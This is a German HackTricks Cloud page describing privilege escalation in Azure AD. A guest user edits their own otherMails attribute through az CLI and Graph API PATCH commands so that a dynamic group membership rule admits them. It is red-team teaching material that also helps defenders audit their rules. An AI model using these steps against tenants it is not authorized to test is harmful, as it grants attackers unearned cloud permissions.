HackTricks CloudAz - Dynamische Gruppen Privesc
Reading time: 3 minutes
tip
Lernen & üben Sie AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Lernen & üben Sie Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.
Grundinformationen
Dynamische Gruppen sind Gruppen, die eine Reihe von Regeln konfiguriert haben, und alle Benutzer oder Geräte, die den Regeln entsprechen, werden der Gruppe hinzugefügt. Jedes Mal, wenn ein Attribut eines Benutzers oder Geräts geändert wird, werden die dynamischen Regeln erneut überprüft. Und wenn eine neue Regel erstellt wird, werden alle Geräte und Benutzer überprüft.
Dynamische Gruppen können Azure RBAC-Rollen zugewiesen werden, aber es ist nicht möglich, AzureAD-Rollen zu dynamischen Gruppen hinzuzufügen.
Diese Funktion erfordert eine Azure AD Premium P1-Lizenz.
Privesc
Beachten Sie, dass standardmäßig jeder Benutzer Gäste in Azure AD einladen kann. Wenn also eine dynamische Gruppen-regel Berechtigungen für Benutzer basierend auf Attributen gewährt, die in einem neuen Gast festgelegt werden können, ist es möglich, einen Gast mit diesen Attributen zu erstellen und die Berechtigungen zu eskalieren. Es ist auch möglich, dass ein Gast sein eigenes Profil verwaltet und diese Attribute ändert.
Holen Sie sich Gruppen, die dynamische Mitgliedschaften erlauben: az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table
Beispiel
- Regelbeispiel:
(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest") - Regelbeschreibung: Jeder Gastbenutzer mit einer sekundären E-Mail, die den String 'security' enthält, wird der Gruppe hinzugefügt.
Für die E-Mail des Gastbenutzers, akzeptieren Sie die Einladung und überprüfen Sie die aktuellen Einstellungen dieses Benutzers in https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView.
Leider erlaubt die Seite nicht, die Attributwerte zu ändern, daher müssen wir die API verwenden:
# Login with the gust user
az login --allow-no-subscriptions
# Get user object ID
az ad signed-in-user show
# Update otherMails
az rest --method PATCH \
--url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
--headers 'Content-Type=application/json' \
--body '{"otherMails": ["newemail@example.com", "anotheremail@example.com"]}'
# Verify the update
az rest --method GET \
--url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
--query "otherMails"
Referenzen
tip
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.